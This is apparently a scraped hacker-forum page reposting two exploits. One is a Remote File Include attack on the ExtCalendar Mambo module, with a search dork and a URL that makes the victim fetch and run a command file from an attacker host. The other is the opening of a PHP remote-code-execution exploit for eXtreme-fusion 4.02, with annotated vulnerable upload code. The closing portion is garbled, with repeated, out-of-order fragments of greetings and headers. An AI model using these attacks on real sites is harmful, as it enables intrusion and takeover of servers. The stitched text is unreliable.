http://www.example.com/i-accueil.php?chemin=conc99 http://www.example.com/i-index.php?chemin=conc99 Black_hat_cr(HCE) ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities ################################################## ############################# Discovered By OLiBekaS dork : "powered by ExtCalendar v2" Exploit : http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_E XT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls greatz: ~~~~~ # Special greetz to my master effex and bEdAh`oTaK ( thank man ) # To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other Contact: ~~~~~~~ Nick: OLiBekaS E-mail: olibekas[at]gmail[dot]Com Homepage: http://bekas.6te.net [ eof ] baby_hacker(HCE) Extreme-fusion <= 4.02 Remote Code Execution Exploit PHP Code: <? //Kacper Settings $exploit_name = "extreme-fusion <= 4.02 Remote Code Execution Exploit"; $script_name = "eXtreme-fusion 4.02"; $script_site = "http://extreme-fusion.pl/download-cat16"; $dork = '"by eXtreme Crew"'; //************************************************************** print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +:+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+#+# #+# #+# ######### ########## ### ########### ########## ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+# #+# #+# ### ########## ### ### ### ### - - [DEVIL TEAM THE BEST POLISH TEAM] - - [Exploit name: '.$exploit_name.' [Script name: '.$script_name.' [Script site: '.$script_site.' dork: '.$dork.' Find by: Kacper (a.k.a Rahim) ========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <======= = ========> http://www.rahim.webd.pl/ <======== Contact: kacper1964@yahoo.pl (c)od3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =- Greetings DragonHeart and all DEVIL TEAM Patriots :) - Leito & Leon | friend str0ke ;) pepi, nukedclx, SkD, MXZ, sysios, mIvus, wacky, xoron, fdj, mass, D3m0n (ziom z Niemiec :P) and Dr Max Virus TamTurk, hackersecurity.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =- Greetings for 4ll Fusi0n Group members ;-) and all members of hacker.com.pl ;) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =- '; /* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- in file infusions/fusion_forum_view/fusion_forum_view.php: [line 1-5] <? if (file_exists(INFUSIONS."fusion_forum_view/locale/".$settings['locale'].".php") ) { // < {2} include INFUSIONS."fusion_forum_view/locale/".$settings['locale'].".php"; // < {1} } else { include INFUSIONS."fusion_forum_view/locale/English.php"; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- in file submit.php: [line 342-373] if (isset($_POST['submit_photo'])) { require_once INCLUDES."photo_functions_include.php"; $error = ""; $submit_info['photo_title'] = stripinput($_POST['photo_title']); $submit_info['photo_description'] = stripinput($_POST['photo_description']); $submit_info['album_id'] = isNum($_POST['album_id']) ? $_POST['album_i d'] : "0"; if (is_uploaded_file($_FILES['photo_pic_file']['tmp_name'])) { $photo_types = array(".gif",".jpg",".jpeg",".png"); $photo_pic = $_FILES['photo_pic_file']; $photo_name = strtolower(substr($photo_pic['name'], 0, strrpos($photo_pic ['name'], "."))); $photo_ext = strtolower(strrchr($photo_pic['name'],".")); $photo_dest = PHOTOS."submissions/"; if (!preg_match("/^[-0-9A-Z_\[\]]+$/i", $photo_name)) { $error = 1; } elseif ($photo_pic['size'] > $settings['photo_max_b']){ $error = 2; } elseif (!in_array($photo_ext, $photo_types)) { $error = 3; } else { $photo_file = image_exists($photo_dest, $photo_name.$photo_ext); move_uploaded_file($photo_pic['tmp_name'], $photo_dest.$photo_file); // < {3(step1)} chmod($photo_dest.$photo_file, 0644); $imagefile = @getimagesize($photo_dest.$photo_file); if (!verify_image($photo_dest.$photo_file)) { $error = 3; unlink($photo_dest.$photo_file); } elseif ($imagefile[0] > $settings['photo_max_w'] || $imagefile[1] > $set tings['photo_max_h']) { $error = 4; unlink($photo_dest.$photo_file); } else { $submit_info['photo_file'] = $photo_file; } } } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- in file submit.php: [line 223-250] if (isset($_POST['upload'])) { opentable($locale['552']); if ($_FILES['plik']['name']!="") { if(!file_exists("downloads/".$_FILES['plik']['name'])) { move_uploaded_file($_FILES['plik']['tmp_name'],"downloads/".$_FILE S['plik']['name']); // < {3(step2)} switch($_FILES['plik']['error']) { case '0': echo $locale['542'].round($_FILES['plik']['size'] / 1024).'KB'; $submit_info['download_title'] = stripinput($_POST['download_titl e']); $submit_info['download_description'] = stripinput($_POST['downl oad_description']); $submit_info['download_url'] = "downloads/".$_FILES['plik'][ . Virus TamTurk, hackersecurity.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =- Greetings for 4ll Fusi0n Group members ;-) and all members of hacker. com.pl. OLiBekaS E-mail: olibekas[at]gmail[dot]Com Homepage: http://bekas.6te.net [ eof ] baby _hacker( HCE) Extreme-fusion <= 4.02 Remote Code Execution Exploit PHP Code: <? //Kacper. ~~~~~ # Special greetz to my master effex and bEdAh`oTaK ( thank man ) # To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy.